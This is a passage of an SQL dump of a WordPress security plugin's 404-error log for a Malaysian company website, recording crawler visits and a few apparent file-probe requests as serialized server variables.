charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"EDD1D9BC-1B5C-48E9-B4CB-A0C5B8ED0510\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZvWgW4e25i9wxupbG-YbAAAAVE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"62326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZvWgW4e25i9wxupbG-YbAAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570494081.2881\";s:12:\"REQUEST_TIME\";s:10:\"1570494081\";}}','notice','2019-10-08 00:21:24','2019-10-08 00:21:21',35785376,37585272,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27651,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/defence-security-solutions/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/defence-security-solutions/\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/defence-security-solutions/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZvUdQLlPPpMaW01YR3CAQAAABM\";s:12:\"REDIRECT_URL\";s:28:\"/defence-security-solutions/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.106\";s:11:\"REMOTE_PORT\";s:4:\"1201\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/defence-security-solutions/\";s:10:\"SCRIPT_URL\";s:28:\"/defence-security-solutions/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZvUdQLlPPpMaW01YR3CAQAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570493557.2166\";s:12:\"REQUEST_TIME\";s:10:\"1570493557\";}}','notice','2019-10-08 00:12:43','2019-10-08 00:12:37',34402776,36208264,'https://bintara.com.my/defence-security-solutions/',1,0,'207.46.13.106'),(27650,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"62791\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZuvEwLTa0pBHYz7EOKCUgAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570483987.3639\";s:12:\"REQUEST_TIME\";s:10:\"1570483987\";}}','notice','2019-10-07 21:33:09','2019-10-07 21:33:07',35417296,37214352,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(27648,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"//aaa.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"346\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:30:\"http://bintara.com.my//aaa.cer\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"http://bintara.com.my/aaa.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/aaa.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZuXqCETv06qdACZfD2SogAAAEw\";s:12:\"REDIRECT_URL\";s:8:\"/aaa.cer\";s:11:\"REMOTE_ADDR\";s:12:\"61.186.65.24\";s:11:\"REMOTE_PORT\";s:5:\"56836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"http://bintara.com.my/aaa.cer\";s:10:\"SCRIPT_URL\";s:8:\"/aaa.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZuXqCETv06qdACZfD2SogAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570477992.5608\";s:12:\"REQUEST_TIME\";s:10:\"1570477992\";}}','notice','2019-10-07 19:53:15','2019-10-07 19:53:13',35811304,37613528,'http://bintara.com.my//aaa.cer',1,0,'61.186.65.24'),(27649,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"89.28.32.203\";s:11:\"REMOTE_PORT\";s:5:\"42389\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZurPwLTa0pBHYz7EOKAcAAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570483007.4102\";s:12:\"REQUEST_TIME\";s:10:\"1570483007\";}}','notice','2019-10-07 21:16:49','2019-10-07 21:16:47',35029072,36833000,'https://bintara.com.my/?page_id=18',1,0,'89.28.32.203'),(27647,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/22.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/22.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZuCuQLTa0pBHYz7EOJtNAAAAVY\";s:12:\"REDIRECT_URL\";s:8:\"/22.html\";s:11:\"REMOTE_ADDR\";s:13:\"66.220.149.24\";s:11:\"REMOTE_PORT\";s:5:\"52190\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:10:\"SCRIPT_URL\";s:8:\"/22.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZuCuQLTa0pBHYz7EOJtNAAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570472633.5578\";s:12:\"REQUEST_TIME\";s:10:\"1570472633\";}}','notice','2019-10-07 18:23:56','2019-10-07 18:23:54',35427080,35784056,'https://bintara.com.my/22.html',1,0,'66.220.149.24'),(27646,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/mod.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/mod.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZuAtE-HfoF3Bc6p6X1CHQAAAYM\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/mod.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZuAtE-HfoF3Bc6p6X1CHQAAAYM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.109.80\";s:11:\"REMOTE_PORT\";s:5:\"56284\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:10:\"SCRIPT_URL\";s:8:\"/mod.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZuAtE-HfoF3Bc6p6X1CHQAAAYM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570472117.0324\";s:12:\"REQUEST_TIME\";s:10:\"1570472117\";}}','notice','2019-10-07 18:15:19','2019-10-07 18:15:17',35043088,36846608,'https://bintara.com.my/mod.php',1,0,'167.71.109.80'),(27644,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.139\";s:11:\"REMOTE_PORT\";s:5:\"45214\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZtkHmm4ola1qjywyRV2PgAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570464798.9706\";s:12:\"REQUEST_TIME\";s:10:\"1570464798\";}}','notice','2019-10-07 16:13:23','2019-10-07 16:13:19',35418008,37219552,'https://bintara.com.my/?page_id=18',1,0,'46.229.168.139'),(27645,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/mod.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/mod.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZuAsE-HfoF3Bc6p6X1CHAAAAYo\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/mod.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZuAsE-HfoF3Bc6p6X1CHAAAAYo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.109.80\";s:11:\"REMOTE_PORT\";s:5:\"55540\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/mod.php\";s:10:\"SCRIPT_URL\";s:8:\"/mod.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZuAsE-HfoF3Bc6p6X1CHAAAAYo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570472113.5946\";s:12:\"REQUEST_TIME\";s:10:\"1570472113\";}}','notice','2019-10-07 18:15:18','2019-10-07 18:15:14',35526968,37320256,'https://bintara.com.my/mod.php',1,0,'167.71.109.80'),(27639,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570446181.5838530063629150390625\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, 